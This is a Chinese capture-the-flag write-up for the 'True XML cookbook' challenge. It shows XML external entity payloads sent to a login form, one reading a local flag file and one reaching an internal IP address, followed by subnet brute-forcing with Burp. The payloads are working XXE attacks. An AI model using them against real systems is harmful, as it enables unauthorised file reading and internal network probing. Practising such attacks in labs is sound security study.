当前位置: 首页 > article >正文

True XML cookbook

article 2025/2/27 5:39:19

打开题目

看到登录口

随便输入admin,123456,然后抓包试一下

先按原来那道题的payload进行测试,payload和结果如下:

<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM  "file:///flag">
]>
<user>
    <username>&file;</username>
    <password>1</password>
</user>

未成功获取到flag信息,试着探测内网信息,读取下系统内的配置文件信息看是否能发现有用的信息

这里获得一个新的地址,尝试下进行连接结果如下:

<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM  "http://10.244.80.49/">
]>
<user>
    <username>&file;</username>
    <password>1</password>
</user>
 

连接失败,那就查询下同网段内存在不存在其他地址,使用bp的爆破模块进行爆破,设置如下:

扫描可得到flag


http://www.kler.cn/a/281079.html

相关文章:

  • 如何使用ssm实现视频点播系统设计与实现+vue
  • Blender小凳子其它细节调整优化
  • 【Docker项目实战】使用Docker部署webtop桌面版Linux环境
  • MS sqlserver备份软件 SQLBackupAndFTP
  • Spring MVC常用注解及用法
  • docker maven 构建的找不到 ClassNotFoundException
  • Java毕业设计 基于SpringBoot vue药店管理系统
  • write your own xx-starter【1】
  • SQLite Insert 语句
  • 筛质数zz
  • 【机器人学】7-3.六自由度机器人自干涉检测-圆柱体的旋转变换【附MATLAB代码】
  • 地平线—征程2(Journey 2-J2)芯片详解(26)—RTC+PADC/GPIO
  • Hive的数据模型
  • 机器人拾取系统关节机械臂通过NY-PN-EIPZ进行命令控制
  • 前端开发学习Docker记录01镜像操作
  • SX_c语言字符串赋值 “multiple definition of .. first defined here”问题_21
  • Java框架myBatis(三)
  • 迷雾大陆辅助:VMOS云手机助力升级装备系统秘籍!
  • Java的内存管理机制
  • 鸿蒙内核源码分析(共享内存) | 进程间最快通讯方式